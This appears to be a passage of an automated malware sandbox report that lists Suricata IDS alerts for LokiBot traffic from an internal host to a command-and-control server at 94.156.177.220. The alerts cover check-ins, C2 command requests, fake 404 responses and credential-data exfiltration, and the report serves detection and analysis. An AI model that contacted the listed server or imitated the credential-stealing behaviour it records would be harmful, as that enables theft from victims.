          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49182 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49182 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49182 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49190 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49190 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49192 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49190 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49189 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49206 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49189 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49206 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49179 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49206 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49191 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49179 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49179 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49182 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49185 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49182 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49185 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49190 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49206 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49206 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49185 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49190 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49189 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49191 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49196 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49191 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49192 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49213 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49201 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49192 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49201 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49201 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49208 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49189 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49181 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49189 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49208 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49208 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49234 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49234 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49233 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49234 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49178 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49187 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49178 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49179 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49178 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49191 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49183 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49233 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49182
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49191 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49183 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49225 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49213 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49181 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49180 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49213 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49181 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49180 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49252 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49180 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49234 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49178 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49234 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49183 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49225 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49197 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49190
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49196 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49242 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49233 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49196 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49252 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49180 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49213 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49252 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49222 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49213 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49181 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49187 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49181 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49228 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49242 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49233 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49180 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49233 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49186 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49187 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49208 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49196 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49222 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49196 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49228 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49242 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49252 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49198 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49249 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49187 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49198 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49197 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49253 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49206
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49225 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49198 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49185 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49208 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49185 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49204 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49204 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49192 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49225 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49204 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49222 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49198 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49198 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49183 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49204 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49183 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49252 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49204 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49249 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49181
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49189
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49198
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49226 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49226 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49222 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49242 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49242 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49253 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49201 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49201 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49193 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49193 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49193 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49186 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49225 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49211 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49193 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49223 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49193 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49193
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49194 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49194 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49184 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49184 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49194 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49204
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49187 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49249 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49197 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49183
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49187
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49214 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49217 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49226 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49217 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49217 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49253 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49197 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49211 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49211 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49185
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49228 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49234
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49223 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49223 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49213
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49211 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49211 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49228 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49228 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49192 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49196
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49180
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49252
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49222 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49242
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49217 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49235 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49253 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49202 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49253 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49202 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49208
